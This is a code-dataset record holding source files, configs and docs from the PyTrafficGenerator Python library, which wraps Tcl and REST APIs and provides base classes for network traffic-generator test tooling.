will be named as the existing\n log file with the requested suffix.\n\n :param logger: existing logger\n :param suffix: string to add to the existing log file name to create the new log file name.\n :param file_type: logger file type (tcl. txt. etc.)\n \"\"\"\n file_handler = None\n for handler in logger.handlers:\n if isinstance(handler, logging.FileHandler):\n file_handler = handler\n new_logger = logging.getLogger(file_type + suffix)\n if file_handler:\n logger_file_name = path.splitext(file_handler.baseFilename)[0]\n tcl_logger_file_name = logger_file_name + \"-\" + suffix + \".\" + file_type\n new_logger.addHandler(logging.FileHandler(tcl_logger_file_name, \"w\"))\n new_logger.setLevel(logger.getEffectiveLevel())\n return new_logger\n\n\ndef get_test_config(test_config_path: str) -> ModuleType:\n \"\"\"Import tests configuration modeule from path.\n\n :param test_config_path: Full path to test configuration module.\n \"\"\"\n spec = importlib.util.spec_from_file_location(\"test_config\", test_config_path)\n test_config = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(test_config)\n return test_config\n"
},
{
"alpha_fraction": 0.6763157844543457,
"alphanum_fraction": 0.7552631497383118,
"avg_line_length": 26.14285659790039,
"blob_id": "5d59739689768dee496ec09f35d842ffb862fd32",
"content_id": "3b3fdb51dd9559f5d37def862bceb48181188a66",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 380,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 14,
"path": "/tox-ci.ini",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "; Tox configuration for CI testing. For manual testing use tox.ini (default).\n; TODO: Implement.\n\n[tox]\nenvlist = py37,py37_64,py38,py38_64,py39,py39_64\nskip_missing_interpreters=True\n\n[testenv]\nbasepython=\n py37: C:\\Python\\Python371\\python.exe\n py39_64: C:\\Python\\Python391\\python.exe\n\ndeps = -r{toxinidir}/requirements-dev.txt\ncommands=pytest --cov=trafficgenerator tests\n"
},
{
"alpha_fraction": 0.6726342439651489,
"alphanum_fraction": 0.6726342439651489,
"avg_line_length": 25.066667556762695,
"blob_id": "5c6c1560240f52e7f52571cbde827cdf2e854e76",
"content_id": "f4a8f54da90df02515e3bd8dae12280a3ca14511",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 15,
"path": "/trafficgenerator/tgn_app.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nBase classes and utilities for TGN applications classes.\n\"\"\"\nimport logging\n\nfrom trafficgenerator.tgn_utils import ApiType\n\n\nclass TgnApp:\n \"\"\" Base class for all TGN applications classes. \"\"\"\n\n def __init__(self, logger: logging.Logger, api_wrapper: ApiType) -> None:\n \"\"\" Initialize logger and API wrapper. \"\"\"\n self.logger = logger\n self.api = api_wrapper\n"
},
{
"alpha_fraction": 0.7108339667320251,
"alphanum_fraction": 0.7108339667320251,
"avg_line_length": 36.18840408325195,
"blob_id": "95dc1291100d887b7e63b8a056732cf6df54bd75",
"content_id": "24fb664cf822169aa6b19a5dac9d206212f07514",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2566,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 69,
"path": "/trafficgenerator/tgn_conftest.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nShared utilities for pytest conftest.\n\"\"\"\nimport logging\nimport sys\nfrom pathlib import Path\n\nimport pytest\nfrom _pytest.config.argparsing import Parser\nfrom _pytest.fixtures import SubRequest\nfrom _pytest.python import Metafunc\n\nfrom trafficgenerator.tgn_utils import ApiType, get_test_config\n\n\ndef tgn_pytest_addoption(parser: Parser, tgn_config: str) -> None:\n \"\"\"Add options to allow the user to determine which APIs and servers to test.\n\n :param parser: pytest parser to config.\n :param tgn_config: Full path to test configuration module.\n \"\"\"\n if Path(tgn_config).exists():\n test_config = get_test_config(tgn_config)\n tgn_api = test_config.api\n tgn_server = test_config.server\n else:\n tgn_api = None\n tgn_server = None\n tgn_config = None\n parser.addoption(\"--tgn-api\", action=\"append\", default=tgn_api, help=\"api options: rest or tcl, where applicable\")\n parser.addoption(\"--tgn-server\", action=\"append\", default=tgn_server, help=\"server name in the configuration file\")\n parser.addoption(\"--tgn-config\", action=\"store\", default=tgn_config, help=\"path to configuration file\")\n\n\ndef pytest_generate_tests(metafunc: Metafunc) -> None:\n \"\"\"Generate tests for each API and server from pytest options.\n\n Both options has defaults, if the user adds the same option it will be duplicated, so we remove it.\n \"\"\"\n if \"api\" in metafunc.fixturenames:\n metafunc.parametrize(\"api\", list(set(metafunc.config.getoption(\"--tgn-api\"))), indirect=True)\n metafunc.parametrize(\"server\", list(set(metafunc.config.getoption(\"--tgn-server\"))), indirect=True)\n\n\[email protected](scope=\"session\")\ndef logger() -> logging.Logger:\n \"\"\" Yields configured logger. \"\"\"\n logger = logging.getLogger(\"tgn\")\n logger.setLevel(logging.DEBUG)\n logger.addHandler(logging.StreamHandler(sys.stdout))\n yield logger\n\n\[email protected](scope=\"session\")\ndef api(request: SubRequest) -> ApiType:\n \"\"\" Yield API type - generate tests will generate API types based on the api option. \"\"\"\n yield ApiType[request.param]\n\n\[email protected](scope=\"session\")\ndef server(request: SubRequest) -> str:\n \"\"\" Yields server name in confing file - generate tests will generate servers based on the server option. \"\"\"\n yield request.param\n\n\[email protected](scope=\"session\")\ndef server_properties(request: SubRequest, server: str) -> dict:\n \"\"\" Yields server properties dict for the requested server. \"\"\"\n yield get_test_config(request.config.getoption(\"--tgn-config\")).server_properties[server]\n"
},
{
"alpha_fraction": 0.7972028255462646,
"alphanum_fraction": 0.8041958212852478,
"avg_line_length": 8,
"blob_id": "8711a3b8d1fbfe153f973369e1a494e19affd4b5",
"content_id": "2e49f9594d43deda8f1a316fbaed9f7e79621a06",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 143,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 16,
"path": "/requirements-dev.txt",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "-r requirements.txt\n\n# Testing\npytest\npytest-cov\npytest-flake8\npytest-isort\ntox\n\n# Packaging\nwheel\nsetuptools-scm\ntwine\n\n# Documentation\nmkdocs"
},
{
"alpha_fraction": 0.5958533883094788,
"alphanum_fraction": 0.5971674919128418,
"avg_line_length": 29.440000534057617,
"blob_id": "2a5793300c22280d368204043a64399c59e9ed20",
"content_id": "9511a74a943a4215e9af0eaf14d3b4ec87454de3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6849,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 225,
"path": "/trafficgenerator/tgn_tcl.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nBase class and utilities for TGN Python Tcl wrapper.\n\"\"\"\nimport json\nimport logging\nimport re\nimport time\nfrom os import path\nfrom queue import Queue\nfrom threading import Thread\nfrom typing import Dict, List, Optional\n\nfrom trafficgenerator.tgn_object import TgnObject\nfrom trafficgenerator.tgn_utils import new_log_file\n\n# Tcl is must only if the test chooses to use Tcl API so it is OK if Tcl is not installed (e.g for some Linux\n# installations). If Tcl interpreter is required and not installed it will fail anyway...\ntry:\n from tkinter import Tcl\n\n from _tkinter import TclError\n\n tcl_interp_g: Optional[Tcl] = None\n \"\"\" Global Tcl interpreter for Tcl based utilities. Does not log its operations. \"\"\"\nexcept ModuleNotFoundError:\n pass\n\n\ndef tcl_str(string: str = \"\") -> str:\n \"\"\"Returns Tcl string surrounded by {}\n\n :param string: Python string.\n \"\"\"\n return \" {\" + string + \"} \"\n\n\ndef tcl_file_name(name: str) -> str:\n \"\"\"Returns normalized file name with forward slashes.\n\n :param name: file name.\n \"\"\"\n return tcl_str(path.normpath(name).replace(\"\\\\\", \"/\"))\n\n\ndef get_args_pairs(arguments: Dict[str, object]) -> str:\n \"\"\"Returns Tcl list of argument pairs <-key, value> to be used in TGN API commands.\n\n :param arguments: Python dictionary of TGN API command arguments <key, value>.\n \"\"\"\n return \" \".join(\" \".join([\"-\" + k, tcl_str(str(v))]) for k, v in arguments.items())\n\n\ndef build_obj_ref_list(objects: List[TgnObject]) -> str:\n \"\"\"Returns Tcl list of all requested objects references.\n\n :param objects: Python list of requested objects.\n \"\"\"\n return \" \".join([o.ref for o in objects])\n\n\ndef tcl_list_2_py_list(tcl_list: str) -> list:\n \"\"\"Recursievely convert embedded Tcl list to embedded Python list using Tcl interpreter.\n\n :param str tcl_list: string representing the Tcl list.\n \"\"\"\n\n if not tcl_list:\n return []\n\n try:\n return json.loads(tcl_list)\n except json.decoder.JSONDecodeError:\n try:\n python_list = tcl_interp_g.eval(\"join \" + tcl_list + \" LiStSeP\").split(\"LiStSeP\")\n except TclError:\n python_list = tcl_interp_g.eval(\"join \" + tcl_str(tcl_list) + \" LiStSeP\").split(\"LiStSeP\")\n if len([i for i in python_list if \"{\" in i]) == 0:\n return python_list\n return [tcl_list_2_py_list(e) for e in python_list]\n\n\ndef py_list_to_tcl_list(py_list: list) -> str:\n \"\"\"Convert Python list to Tcl list using Tcl interpreter.\n\n :param py_list: Python list.\n \"\"\"\n py_list_str = [str(s) for s in py_list]\n return tcl_str(tcl_interp_g.eval(\"split\" + tcl_str(\"\\t\".join(py_list_str)) + \"\\\\t\"))\n\n\nclass TgnTk:\n \"\"\" Native Python Tk interpreter. \"\"\"\n\n def __init__(self):\n self.tcl = Tcl()\n\n def eval(self, command):\n return self.tcl.eval(command)\n\n\nclass TgnTkThread(Thread):\n \"\"\" Native Python Tk interpreter with multithreading. 
\"\"\"\n\n _is_running = True\n\n def __init__(self):\n super().__init__()\n self.in_q = Queue()\n self.out_q = Queue()\n self.tcl = None\n\n def run(self):\n if not self.tcl:\n self.tcl = Tcl()\n while self._is_running:\n if not self.in_q.empty():\n command = self.in_q.get()\n try:\n rc = self.tcl.eval(command)\n self.out_q.put(rc)\n except Exception as e:\n self.out_q.put(e)\n time.sleep(1)\n\n def stop(self):\n self._is_running = False\n\n def eval(self, command):\n self.in_q.put(command)\n while self.out_q.empty():\n time.sleep(1)\n rc = self.out_q.get()\n if isinstance(rc, Exception):\n raise rc\n return rc\n\n\nclass TgnTclConsole:\n \"\"\"Tcl interpreter over console.\n\n Current implementation is a sample extracted from actual project where the console is telnet to Windows machine.\n \"\"\"\n\n def __init__(self, con, tcl_exe) -> None:\n \"\"\"Start Tcl interpreter on console.\n\n :param con: console.\n :param tcl_exe: full path to Tcl exe.\n \"\"\"\n super().__init__()\n self._con = con\n self._con.set_prompt_match_expression(\"% \")\n self._con.send_cmd(tcl_exe)\n\n def eval(self, command: str) -> str:\n \"\"\"Evaluate Tcl command.\n\n :param command: command to evaluate.\n \"\"\"\n # Some operations (like take ownership) may take long time.\n con_command_out = self._con.send_cmd(command, timeout=256)\n if \"ERROR_SEND_CMD_EXIT_DUE_TO_TIMEOUT\" in con_command_out:\n raise TclError(f\"{command} - command timeout\")\n command = command.replace(\"\\\\\", \"/\")\n con_command_out = con_command_out.replace(\"\\\\\", \"/\")\n command = command.replace(\"(\", r\"\\(\").replace(\")\", r\"\\)\")\n command = command.replace(\"{\", r\"\\{\").replace(\"}\", r\"\\}\")\n m = re.search(command + \"(.*)\" + \"%\", con_command_out, re.DOTALL)\n command_out = m.group(1).strip()\n if \"couldn't read file\" in command_out or \"RuntimeError\" in command_out:\n raise TclError(command_out)\n return command_out\n\n def disconnect(self) -> None:\n self._con.set_prompt_match_expression(\"C:.*>\")\n self._con.send_cmd(\"exit\")\n\n\nclass TgnTclWrapper:\n \"\"\" Tcl connectivity for TGN projects. \"\"\"\n\n def __init__(self, logger: logging.Logger, tcl_interp=None):\n \"\"\"Init Python Tk package.\n\n Add logger to log Tcl commands only.\n This creates a clean Tcl script that can be used later for debug.\n We assume that there might have both multiple Tcl sessions simultaneously so we add suffix to create\n multiple distinguished Tcl scripts.\n \"\"\"\n\n if not logger:\n logger = logging.getLogger(\"dummy\")\n self.logger = logger\n self.tcl_script = new_log_file(self.logger, self.__class__.__name__)\n\n if not tcl_interp:\n self.tcl_interp = TgnTk()\n else:\n self.tcl_interp = tcl_interp\n global tcl_interp_g\n tcl_interp_g = self.tcl_interp\n self.rc = None\n\n def eval(self, command):\n \"\"\"Execute Tcl command.\n\n Write the command to tcl script (.tcl) log file.\n Execute the command.\n Write the command and the output to general (.txt) log file.\n\n :param command: Command to execute.\n :returns: command raw output.\n \"\"\"\n\n if self.logger.handlers:\n self.logger.debug(command)\n if self.tcl_script:\n self.tcl_script.info(command)\n self.rc = self.tcl_interp.eval(command)\n if self.logger.handlers:\n self.logger.debug(\"\\t\" + self.rc)\n return self.rc\n\n def source(self, script_file):\n self.eval(\"source \" + tcl_file_name(script_file))\n"
},
{
"alpha_fraction": 0.738095223903656,
"alphanum_fraction": 0.738095223903656,
"avg_line_length": 13,
"blob_id": "40d0b08e46bb05d19b29de33ff831903ee878c4d",
"content_id": "c8d2f7ed279b5c81fa3063c0c80407271c84d044",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 42,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 3,
"path": "/docs/getting_started.md",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "# Getting Started\n---\nUnder construction.\n"
},
{
"alpha_fraction": 0.7352941036224365,
"alphanum_fraction": 0.7352941036224365,
"avg_line_length": 18.75,
"blob_id": "310f6f46024fa2a425ea34f455bc66e836e3ec56",
"content_id": "6c7807691d3857745be557e9b3c43dc5a69c2708",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 238,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 12,
"path": "/tests/conftest.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\nimport logging\nimport sys\n\nimport pytest\n\n\[email protected](scope='session')\ndef logger():\n logger = logging.getLogger('tgn')\n logger.setLevel(logging.DEBUG)\n logger.addHandler(logging.StreamHandler(sys.stdout))\n yield logger\n"
},
{
"alpha_fraction": 0.8382353186607361,
"alphanum_fraction": 0.8382353186607361,
"avg_line_length": 21.66666603088379,
"blob_id": "5055d42641fc212bd0cd4fdf1b327d853bd8d661",
"content_id": "b68e5a04d7f6a91eaa8d8e8724e4dbadc2dda53c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 68,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 3,
"path": "/docs/index.md",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "Welcome to PyTrafficGenerator Documentation\n---\nUnder construction.\n"
},
{
"alpha_fraction": 0.6096330881118774,
"alphanum_fraction": 0.6115679740905762,
"avg_line_length": 33.29146957397461,
"blob_id": "59a959baa66a3ed7b811a56612b9711c5117418c",
"content_id": "4db2fadfd461f74fda2ec8e2a8ce0cd71942afc7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14471,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 422,
"path": "/trafficgenerator/tgn_object.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nBase class and utilities for all TGN objects.\n\"\"\"\nfrom __future__ import annotations\n\nimport gc\nimport json\nfrom abc import ABC, abstractmethod\nfrom collections import OrderedDict\nfrom typing import Dict, List, Optional, Type\n\nfrom trafficgenerator.tgn_utils import TgnError\n\n\n# Workaround IXN object reference bugs.\n# Object reference with float sequential number instead of integer.\n# For example, endpointset->sources attribute might return:\n# vport:1/protocols/bgp/neighborRange:1.0/routeRange:1.\n# Object reference with neighborPairs (plural) instead of neighborPair (single).\ndef _wa_norm_obj_ref(obj_ref):\n return obj_ref.replace(\".0\", \"\").replace(\"neighborPairs:\", \"neighborPair:\")\n\n\nclass TgnObjectsDict(OrderedDict):\n \"\"\"Dictionary to map from TgnObjects to whatever data.\n\n Dictionary keys must be TgnObject but then it can be accessed by the object itself, the object reference or the\n object name.\n \"\"\"\n\n def __setitem__(self, key, value):\n if not isinstance(key, TgnObject):\n raise TgnError(f\"tgn_object_dict keys must be TgnObject, not {type(key)}\")\n return OrderedDict.__setitem__(self, key, value)\n\n def __getitem__(self, key):\n if key in self.keys():\n return OrderedDict.__getitem__(self, key)\n else:\n for obj in self:\n if obj.name == key or obj.ref == key:\n return OrderedDict.__getitem__(self, obj)\n\n def dumps(self, indent=1):\n \"\"\"Returns nested string representation of the dictionary (like json.dumps).\n\n :param indent: indentation level.\n \"\"\"\n str_keys_dict = OrderedDict({str(k): v for k, v in self.items()})\n for k, v in str_keys_dict.items():\n if isinstance(v, dict):\n str_keys_dict[k] = OrderedDict({str(k1): v1 for k1, v1 in v.items()})\n for k1, v1 in str_keys_dict[k].items():\n if isinstance(v1, dict):\n str_keys_dict[k][k1] = OrderedDict({str(k2): v2 for k2, v2 in v1.items()})\n return json.dumps(str_keys_dict, indent=indent)\n\n\nclass TgnSubStatsDict(TgnObjectsDict):\n \"\"\"Dictionary that assumes it contains sub dictionary so if a requested key does not exit it will assume it is a\n key of the first sub-dictionary.\n\n Port and stream statistics should be hierarchical - {rx port, {key, value}} - to support multicast traffic.\n However, in most cases there is only one RX port so the rx port level is redundant.\n \"\"\"\n\n def __getitem__(self, key):\n if super().__getitem__(key) is not None:\n return super().__getitem__(key)\n else:\n if len(self) > 1:\n raise KeyError(\"multiple values\")\n return list(self.values())[0][key]\n\n\nclass TgnObject(ABC):\n \"\"\" Base class for all TGN classes. \"\"\"\n\n objects = OrderedDict()\n \"\"\" Dictionary of child objects <object reference: object name>. \"\"\"\n\n def __init__(self, parent: TgnObject, **data: str) -> None:\n \"\"\"Create new TGN object in the API.\n\n If object does not exist on the chassis, create it on the chassis as well.\n\n :param parent: object parent. 
If == None the api and logger attributes must be set explicitly by the caller.\n \"\"\"\n\n super().__init__()\n self._data = {}\n self.objects = OrderedDict()\n self._set_data(**data)\n self._data[\"parent\"] = parent\n if self.parent:\n self.api = self.parent.api\n self.logger = self.parent.logger\n if \"objRef\" not in self._data:\n self._data[\"objRef\"] = self._create()\n if \"name\" not in self._data:\n self._data[\"name\"] = self.ref\n if self._data.get(\"parent\", None):\n # todo: make sure each object has parent and test only for None parents (STC project and IXN root).\n self._data[\"parent\"].objects[self.ref] = self\n\n def __str__(self) -> str:\n return self.name\n\n def get_child(self, *types: str) -> Optional[TgnObject]:\n \"\"\"Returns the first (and for most useful cases only) child of the requested type(s).\n\n :param types: list of requested types.\n \"\"\"\n children = list(self.get_children(*types))\n return children[0] if children else None\n\n def get_object_by_ref(self, obj_ref):\n \"\"\"\n :param obj_ref: requested object reference.\n :return: the first object with the requested object reference in the object branch.\n \"\"\"\n return self._get_object_by_key(\"objRef\", _wa_norm_obj_ref(obj_ref))\n\n def get_object_by_name(self, obj_name):\n \"\"\"\n :param obj_name: requested object name.\n :return: the first object with the requested object name in the object branch.\n \"\"\"\n return self._get_object_by_key(\"name\", obj_name)\n\n def _get_object_by_key(self, key, value, *types):\n if self._data[key] == value and (types and self.ref in types or not types):\n return self\n else:\n if not types:\n children = self.objects.values()\n else:\n children = self.get_objects_by_type(*types)\n for child in children:\n obj = child._get_object_by_key(key, value, *types)\n if obj is not None:\n return obj\n\n def get_objects_by_type(self, *types) -> List[TgnObject]:\n \"\"\"Returned objects stored in memory (without re-reading them from the TGN).\n\n Use this method for fast access to objects in case of static configurations.\n\n :param types: requested object types.\n \"\"\"\n if not types:\n return list(self.objects.values())\n types_l = [o.lower() for o in types]\n return [o for o in self.objects.values() if o.type.lower() in types_l]\n\n def get_object_by_type(self, *types: str) -> Optional[TgnObject]:\n \"\"\"Return the first child object stored in memory (without re-reading them from the TGN).\n\n :param types: requested object types.\n \"\"\"\n children = self.get_objects_by_type(*types)\n return children[0] if any(children) else None\n\n def get_objects_by_type_in_subtree(self, *types):\n \"\"\"\n :param types: requested object types.\n :return: all children of the specified types.\n \"\"\"\n\n typed_objects = self.get_objects_by_type(*types)\n for child in self.objects.values():\n typed_objects += child.get_objects_by_type_in_subtree(*types)\n return typed_objects\n\n def get_objects_or_children_by_type(self, *types):\n \"\"\"Get objects if children already been read or get children.\n\n Use this method for fast access to objects in case of static configurations.\n\n :param types: requested object types.\n :return: all children of the specified types.\n \"\"\"\n\n objects = self.get_objects_by_type(*types)\n return objects if objects else self.get_children(*types)\n\n def get_object_or_child_by_type(self, *types):\n \"\"\"Get object if child already been read or get child.\n\n Use this method for fast access to objects in case of static configurations.\n\n :param 
types: requested object types.\n :return: all children of the specified types.\n \"\"\"\n\n objects = self.get_objects_or_children_by_type(*types)\n return objects[0] if any(objects) else None\n\n def get_objects_with_object(self, obj_type, *child_types):\n \"\"\"\n :param obj_type: requested object type.\n :param child_types: requested child types.\n :return: all children of the requested type that have the requested child types.\n \"\"\"\n\n return [o for o in self.get_objects_by_type(obj_type) if o.get_objects_by_type(*child_types)]\n\n def get_objects_without_object(self, obj_type, *child_types):\n \"\"\"\n :param obj_type: requested object type.\n :param child_types: unrequested child types.\n :return: all children of the requested type that do not have the unrequested child types.\n \"\"\"\n return [o for o in self.get_objects_by_type(obj_type) if not o.get_objects_by_type(*child_types)]\n\n def get_objects_with_attribute(self, obj_type: str, attribute: str, value: str) -> List[TgnObject]:\n \"\"\"Returns all children of the requested type that have the requested attribute == requested value.\n\n :param obj_type: requested object type.\n :param attribute: requested attribute.\n :param value: requested attribute value.\n \"\"\"\n return [o for o in self.get_objects_by_type(obj_type) if o.get_attribute(attribute) == value]\n\n def get_ancestor_object_by_type(self, obj_type):\n \"\"\"\n :param obj_type: requested ancestor type.\n :return: the ancestor of the object who's type is obj_type if exists else None.\n \"\"\"\n\n if self.type.lower() == obj_type.lower():\n return self\n else:\n if not self.parent:\n return None\n return self.parent.get_ancestor_object_by_type(obj_type)\n\n def del_object_from_parent(self):\n \"\"\" Delete object from parent object. \"\"\"\n if self.parent:\n self.parent.objects.pop(self.ref)\n\n def del_objects_by_type(self, type_):\n \"\"\"Delete all children objects.\n\n :param type_: type of objects to delete.\n \"\"\"\n [o.del_object_from_parent() for o in self.get_objects_by_type(type_)]\n\n def get_object_from_attribute(self, attribute: str) -> Optional[TgnObject]:\n \"\"\"Read attribute as reference and return an object for it.\n\n Return object for the reference exists in the objects tree, else create new one under the self object.\n Return None for empty attribute.\n\n :param attribute: attribute containing the object references.\n \"\"\"\n objects = self.get_objects_from_attribute(attribute)\n return objects[0] if objects else None\n\n @classmethod\n def get_objects_of_class(cls):\n \"\"\"\n :return: all instances of the requested class.\n \"\"\"\n return list(o for o in gc.get_objects() if isinstance(o, cls))\n\n #\n # Simple utilities to return object _data. Maybe it's not Pythonic (more like Java) but after\n # changing the key name couple of times I decided to go for it.\n #\n\n def obj_name(self) -> str:\n \"\"\"\n :return: object name.\n \"\"\"\n return self._data[\"name\"]\n\n name = property(obj_name)\n\n def obj_ref(self) -> str:\n \"\"\"Object reference is unique, descriptive, ID within the objects tree.\n\n In some TGs (IxNetwork, STC, IxLoad...) the reference is maintained by the TG itself and is used for API calls.\n In others (Xena, TRex...) 
the reference is maintained by the TG package and may (Xena REST) or may not be used\n for API calls.\n If the reference is not used for API calls, use index or relative index for API calls.\n\n :return: object reference.\n \"\"\"\n return str(self._data[\"objRef\"])\n\n ref = property(obj_ref)\n\n def obj_type(self) -> str:\n \"\"\"\n :return: object type.\n \"\"\"\n return self._data[\"objType\"]\n\n type = property(obj_type)\n\n def obj_parent(self) -> TgnObject:\n \"\"\"\n :return: object parent.\n \"\"\"\n return self._data[\"parent\"]\n\n parent = property(obj_parent)\n\n def obj_index(self) -> str:\n \"\"\"Object index is the index string used for API calls when object reference there is not used.\n\n Object index structure is something like chassis/card/port.\n\n :return: object index.\n \"\"\"\n return str(self._data[\"index\"])\n\n index = property(obj_index)\n\n def obj_id(self) -> int:\n \"\"\"Object ID is the relative ID of the object.\n\n :return: object relative ID.\n \"\"\"\n return int(self.index.split(\"/\")[-1]) if self.index else None\n\n id = property(obj_id)\n\n #\n # Private methods.\n #\n\n def _set_data(self, **data):\n self._data.update(data)\n\n def _build_children_objs(self, child_type, children):\n children_objs = OrderedDict()\n child_obj_type = self.get_obj_class(child_type)\n for child in (c for c in children if c != \"\"):\n child_object = child_obj_type(parent=self, objRef=child, objType=child_type)\n child_object._set_data(name=child_object.get_name())\n children_objs[child_object.obj_ref()] = child_object\n self.objects.update(children_objs)\n return children_objs\n\n #\n # Abstract API methods.\n #\n\n @abstractmethod\n def _create(self, **attributes: Dict[str, object]) -> str:\n \"\"\"Create new object on the chassis and return its object reference.\n\n :param attributes: additional attributes for the create command.\n \"\"\"\n pass\n\n @abstractmethod\n def get_name(self) -> str:\n \"\"\" Get object name. \"\"\"\n pass\n\n @abstractmethod\n def get_attributes(self) -> Dict[str, str]:\n \"\"\" Get all attributes values. \"\"\"\n pass\n\n @abstractmethod\n def get_attribute(self, attribute: str) -> str:\n \"\"\"Get single attribute value.\n\n :param attribute: attribute name.\n \"\"\"\n pass\n\n @abstractmethod\n def get_children(self, *types: str) -> List[TgnObject]:\n \"\"\"Get all children of the requested types.\n\n :param types: requested children types.\n \"\"\"\n pass\n\n @abstractmethod\n def get_objects_from_attribute(self, attribute: str) -> List[TgnObject]:\n \"\"\"Read attribute as list of references and return an object for each of them.\n\n For each reference in the attribute, return its object if exists in the objects tree or create new object under\n the self object.\n Return empty list for empty attribute.\n\n :param attribute: attribute containing the object references.\n \"\"\"\n pass\n\n @abstractmethod\n def get_obj_class(self, obj_type: str) -> Type[TgnObject]:\n \"\"\"Returns the object class based on parent and object type.\n\n :param obj_type: requested object type.\n \"\"\"\n pass\n\n\nclass TgnL3(ABC):\n \"\"\" ABC for all L3 objects. \"\"\"\n\n @abstractmethod\n def ip(self):\n \"\"\"\n :return: IP address.\n \"\"\"\n pass\n\n @abstractmethod\n def num_ips(self):\n \"\"\"\n :return: number of IP addresses.\n \"\"\"\n pass\n"
},
{
"alpha_fraction": 0.6888977885246277,
"alphanum_fraction": 0.6952875256538391,
"avg_line_length": 20.973684310913086,
"blob_id": "361e2619dae791e60f62078758b54b64cc5f287e",
"content_id": "2892871ba68dd7116d304d5054bf2993c080b8c1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2504,
"license_type": "permissive",
"max_line_length": 150,
"num_lines": 114,
"path": "/docs/style.md",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "Style Guide\n---\n\nAs we all know, python is very stylish language.\nSo first, we follow [PEP 8](https://www.python.org/dev/peps/pep-0008/) and [PEP 257](https://www.python.org/dev/peps/pep-0257/).\n\nWhere this style guide conflicts with the PEPs - **fix the style guide**.\n\nAnyway, this style guide does not try to invent anything, but select one style where several pythonic options are\navailable.\n\nImports\n=======\nImports should be grouped and ordered, from the general to the specific.\nThere should be a blank line between groups.\n```python\nimport logging\nimport os\n\nimport requests\n\nimport trafficgenerator\n```\nDo not use relative imports.\n\nMethods ordering\n================\nMethods with class should be grouped as following:\n\nFirst, all dundar (operation overloading) starting with __init__.\nThen business logic methods.\nThen properties.\nAnd private methods at the end.\n\n```python\n\nclass MyClass:\n\n def __init__(self):\n pass\n\n def __str__(self):\n pass\n\n def do_something(self):\n pass\n\n def do_something_else(self):\n pass\n\n @property\n def property_1(self):\n pass\n\n @property\n def property_2(self):\n pass\n\n def _private_1(self):\n pass\n\n def _private_2(self):\n pass\n```\n\nStrings and Docstrings\n======================\nUse single quotes ('') for strings and double-quotes (\"\") for docstrings.\n\nThe summary line should be in the the same line as the opening quotes. Add one space between the quotes and the line.\n\nRemove the docstring, this is a standard pytest method name, and you do not need to document it, especially when your docstring does not explain much.\n\nDo not shout, please use only lowercase and try to refrain from using exclamation marks and ellipses.\n\nComments\n========\nThe golden rule for comments is - More is less.\n\nThe code should be self-explanatory and comments should be used only the explain the `WHY` and `WHAT`, the `HOW` should\nbe clear from the code.\n\nTry to limit the comment to one line.\n\nLogger\n======\nLog level matters - please set it carefully.\n\nDo not shout, please use only lowercase and try to refrain from using exclamation marks and ellipses.\n\nLine breaks\n===========\nPlease refrain from using `\\\\`. Break long lines on commas, dots, etc.\n\nType hints\n==========\nAdd type hinting in method definitions.\n\nType hinting in the code itself is optional.\n\nGeneral\n=======\nAlways prefer positive conditions.\n\nRight:\n```python\nif True:\n pass\n```\nWrong:\n```python\nif not False:\n pass\n```"
}
] | 15 |
CoworkerOrg/clicktocall-flask
|
https://github.com/CoworkerOrg/clicktocall-flask
|
536386c502aa40b95f36f5dc8a8c3fc836a68412
|
ecfc66c11da115fcee2677a93d376ab4f2fb16ea
|
d908d820d0480aefaffcf57a55c372cc87a5792c
|
refs/heads/master
| 2020-04-02T00:06:43.567171 | 2018-11-06T16:00:35 | 2018-11-06T16:00:35 | 153,789,482 | 0 | 0 |
MIT
| 2018-10-19T13:46:09 | 2017-06-30T12:46:03 | 2017-11-30T13:16:39 | null |
[
{
"alpha_fraction": 0.7135922312736511,
"alphanum_fraction": 0.7215357422828674,
"avg_line_length": 38.068965911865234,
"blob_id": "2d641eef37e7ca96eeac23f0c5f8e9b109469e25",
"content_id": "ec7377987387b5360b52e56d41b3fa0bdbeb103c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
